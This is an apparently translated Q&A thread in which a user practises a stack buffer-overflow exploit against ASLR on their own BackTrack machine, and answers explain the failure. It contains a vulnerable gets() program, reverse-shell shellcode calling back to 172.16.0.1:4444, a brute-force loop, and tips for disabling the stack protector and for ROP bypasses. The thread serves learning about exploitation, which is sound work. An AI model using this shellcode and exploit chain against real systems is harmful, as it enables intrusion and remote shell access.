2

为了练习,我一直在尝试在我的机器上强制执行 ASLR 实现。首先,我确保 ASLR 已打开。

cat /proc/sys/kernel/randomize_va_space
1

我使用的机器是:-

bt ~ # uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium3 i386 GNU/Linux

我的程序很简单,如下。

bt ~ # cat t.c
#include<stdio.h>


int main(int argc, char **argv) {
char buffer[50];
gets(buffer);
return 0;
}

为了利用这一点,我创建了一个环境变量,如下所示。正如你所看到的,它有一个非常大的 nop 雪橇,带有用于反向 shell 的漏洞利用代码。

export EGG=`perl -e 'print "\x90"x64000 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xac\x10\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`

我使用以下 C 程序找出环境变量的地址:

int main(int argc, char **argv) {
printf("%p\n", getenv(argv[1]));
return 0;
}

我得到的地址为0xbfefadfd

我发现溢出返回地址需要76 bytes of something+ 4 bytes of the return address。所以,为了蛮力我这样做: -

$ echo `perl -e 'print "A"x76 . "\xfd\xad\xef\xbf"'` > file
$ while true; do ./t < file; done

正如预期的那样,我得到了分段错误的日志,但是,即使在运行程序大约 30 分钟后,我也没有得到反向 shell。我在这里做错了什么?

4

3 回答 3

2

您必须考虑几件事情。1. 你的 shellcode 必须与你的架构相匹配。(这很容易测试)。2. 因为你把你的shellcode放在栈上,你必须确保栈是可执行的。实现此目的的一种方法是使用“-z execstack”-flag 编译到 gcc。

此外,可能还有其他方法可能会增加您点击正确地址的机会。

于 2011-05-15T14:02:46.357 回答
2

可能是堆栈不可执行。你可以检查一下readelf。如果该GNU_STACK部分未标记为可执行,则您的应用程序具有 NX 堆栈。

顺便说一句,在这种情况下有更好的方法来击败 ASLR。

您可以做的是返回地址未被 ASLR 更改的 .text 部分。pop-ret, pop-pop-ret 会弹出堆栈,直到您达到一些“可用”值。可用的东西是高度情境化的。通常,您会寻找指向输入字符串、环境变量等的指针。

此外,面向返回的编程(ROP)现在是一个流行词。一探究竟。

于 2011-05-15T14:03:48.747 回答
1

我不知道你在哪个平台上尝试这个,但很可能除了 ASLR 之外,你的 gcc 默认也使用堆栈金丝雀/保护。使用 -fno-stack-protector 禁用此编译。

于 2011-05-15T11:09:01.453 回答